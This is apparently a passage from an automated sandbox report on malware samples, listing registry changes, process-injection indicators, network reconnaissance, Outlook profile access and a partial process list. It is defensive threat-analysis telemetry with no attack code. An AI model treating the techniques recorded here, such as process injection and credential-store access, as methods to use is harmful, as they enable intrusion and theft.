| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\explorer.exe = "0" | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\explorer.exe = "0" | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\svchost.exe = "0" | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\SOFTWARE\Microsoft\Internet Explorer\International | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\svchost.exe = "0" | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" | C:\Windows\SysWOW64\svchost.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\NavBar = 000000000000000000000000000000008b000000870000003153505305d5cdd59c2e1b10939708002b2cf9ae6b0000005a000000007b00360044003800420042003300440033002d0039004400380037002d0034004100390031002d0041004200350036002d003400460033003000430046004600450046004500390046007d005f0057006900640074006800000013000000cc0000000000000000000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202020202 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Rev = "0" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\SniffedFolderType = "Documents" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings | C:\Users\Admin\Desktop\2023-09-04\49dedf19d0d69cc9c0247803d3748ccf25b2c17504f6e07c48a84d8515ec1575.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 3a002e80922b16d365937a46956b92703aca08af260001002600efbe11000000b32dd5d24fdcd90124472bd55adcd90124472bd55adcd90114000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 01000000020000000300000000000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\1 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616193" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202020202020202 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "14" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\1\0 | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656} | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\2023-09-04\9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\2023-09-04\38d0c2cf38e1dcaca20a6d79903a6075d171d2b31c980c4a789965a783b23b49.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\2023-09-04\38d0c2cf38e1dcaca20a6d79903a6075d171d2b31c980c4a789965a783b23b49.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\2023-09-04\06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ufclwciske.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ufclwciske.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ufclwciske.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ufclwciske.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ufclwciske.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\systray.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\systray.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\2023-09-04.zip
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\2023-09-04\" -spe -an -ai#7zMap15470:78:7zEvent15735
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Desktop\2023-09-04\0af4b2f2226ca4fa843cec93b45e5b13a717839df876ca60b563e11ba2acb608.pdf"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=18D2D1E443BEB4D6CDC93A5721843840 --mojo-platform-channel-handle=1776 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=AA4B97FB42B939E214AA17F22777DF34 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=AA4B97FB42B939E214AA17F22777DF34 --renderer-client-id=2 --mojo-platform-channel-handle=1792 --allow-no-sandbox-job /prefetch:1
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=C41E2289331639AD6EEE7B6F7EB2B134 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=C41E2289331639AD6EEE7B6F7EB2B134 --renderer-client-id=4 --mojo-platform-channel-handle=2076 --allow-no-sandbox-job /prefetch:1
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=44135C589A5A20BFBA9A452488950D0E --mojo-platform-channel-handle=2224 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
